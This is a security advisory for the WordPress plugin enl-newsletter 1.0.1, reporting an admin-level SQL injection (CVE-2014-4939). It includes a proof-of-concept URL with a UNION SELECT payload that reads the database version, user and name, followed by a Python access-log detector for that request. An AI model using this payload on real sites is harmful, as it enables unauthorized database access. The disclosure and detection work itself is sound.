wp-plugin : enl-newsletter

Plugin Details
Plugin Name: wp-plugin : enl-newsletter
Affected Version : 1.0.1 (and most probably lower versions, if any)
Vulnerability : Injection
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Administrator
PoC - (Proof of Concept) :

<http://localhost/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1>
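A detection check for the request shape in the PoC above, as an added example that is not part of the original advisory: it flags access-log entries that reach `page=enl-add-new` with an `id` value that is not a plain integer. The log lines are constructed, and the combined log format, the `other-plugin` page name and all function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Request line of a combined-format access log entry (the log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/[\d.]+"')
VULN_PAGE = "enl-add-new"           # admin page named in the PoC
STRICT_INT = re.compile(r"[0-9]+")  # the only shape a legitimate id should have

# Constructed sample entries: benign edit, the PoC request, an unrelated admin page.
SAMPLE_LOG = [
    '203.0.113.7 - admin [28/May/2014:10:00:01 +0000] "GET /wp-admin/admin.php?page=enl-add-new&id=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - admin [28/May/2014:10:00:09 +0000] "GET /wp-admin/admin.php?page=enl-add-new&id=2%20union%20select%201,@@version,3,user(),database(),6,7,8,9,0,1 HTTP/1.1" 200 5342',
    '203.0.113.7 - admin [28/May/2014:10:00:15 +0000] "GET /wp-admin/admin.php?page=other-plugin&id=abc HTTP/1.1" 200 811',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so a double-encoded value is reported in readable form."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_id(line):
    """Return the decoded id if the entry hits the vulnerable page with a non-integer id, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if VULN_PAGE not in params.get("page", []):
        return None
    for raw in params.get("id", []):
        value = fully_decode(raw)
        if not STRICT_INT.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_id) for every flagged entry."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_id(line)) is not None]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-integer id on {VULN_PAGE}: {value!r}")
```

Because the check is an allowlist on the integer shape rather than a keyword match, it does not depend on which SQL the request carries.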

Disclosure Timeline
Vendor Contacted : 2013-12-28
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4939
Plugin Description :
**Main Features:**

1. Set up multiple newsletters according to the post categories.
2. Different send modes include manual, weekly and monthly.
3. Custom newsletter content, template and post count.
4. Newsletter signup widget for user registration.
5. Subscriber info list containing email, IP and registration time.
6. Import WordPress users to subscriber list.

**More info:**

* [Leave a comment](http://www.wp-coder.net/enl-newsletter/)